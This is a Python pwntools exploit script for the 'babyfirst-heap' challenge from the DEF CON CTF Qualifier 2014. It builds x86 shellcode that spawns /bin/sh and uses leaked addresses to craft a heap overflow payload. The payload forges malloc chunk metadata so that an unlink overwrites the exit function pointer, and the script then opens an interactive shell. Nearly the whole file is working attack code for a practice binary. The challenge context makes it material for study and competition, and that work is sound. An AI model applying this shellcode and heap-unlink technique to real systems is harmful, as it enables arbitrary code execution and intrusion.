exploit.py

#!/usr/bin/env python2

# DEF CON CTF Qualifier 2014: heap
# https://github.com/ctfs/write-ups-2014/blob/master/def-con-ctf-qualifier-2014/heap/README.md

from pwn import *

padding = 260

shellcode = ''
shellcode += '\xeb\06'              # jmp    0x08
shellcode += '\x90' * 6
shellcode += '\x31\xd2'             # xor    edx,edx
shellcode += '\x52'                 # push   edx
shellcode += '\x68\x2f\x2f\x73\x68' # push   0x68732f2f
shellcode += '\x68\x2f\x62\x69\x6e' # push   0x6e69622f
shellcode += '\x89\xe3'             # mov    ebx,esp
shellcode += '\x52'                 # push   edx
shellcode += '\x53'                 # push   ebx
shellcode += '\x89\xe1'             # mov    ecx,esp
shellcode += '\x8d\x42\x0b'         # lea    eax,[edx+0xb]
shellcode += '\xcd\x80'             # int    0x80

r = process('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')
# r = remote('0.0.0.0', 4000)

r.recvuntil('Exit function pointer is at ')
addr_exit_func_ptr = int(r.recvuntil(' '), 16)
log.info('addr_exit_func_ptr: 0x%x' % addr_exit_func_ptr)

for i in xrange(11):
    r.readline()
r.recvuntil('loc=')
addr_writable_heap = int(r.recvuntil(']')[:-1], 16)
log.info('addr_writable_heap: 0x%x' % addr_writable_heap)

# http://gee.cs.oswego.edu/pub/misc/malloc-2.6.1.c
# 
# struct malloc_chunk
# {
#   size_t size;               /* Size in bytes, including overhead. */
#   struct malloc_chunk* fd;   /* double links -- used only if free. */
#   struct malloc_chunk* bk;
#   size_t unused;             /* to pad decl to min chunk size */
# };

r.recvuntil('Write to object [size=260]:\n')
payload = ''
payload += shellcode
payload += '\x90' * (padding - len(payload))

payload += p32(1)                       # size (mark next chunk freed)
payload += p32(addr_exit_func_ptr - 8)  # fd
payload += p32(addr_writable_heap)      # bk
r.sendline(payload)

r.clean()
r.interactive()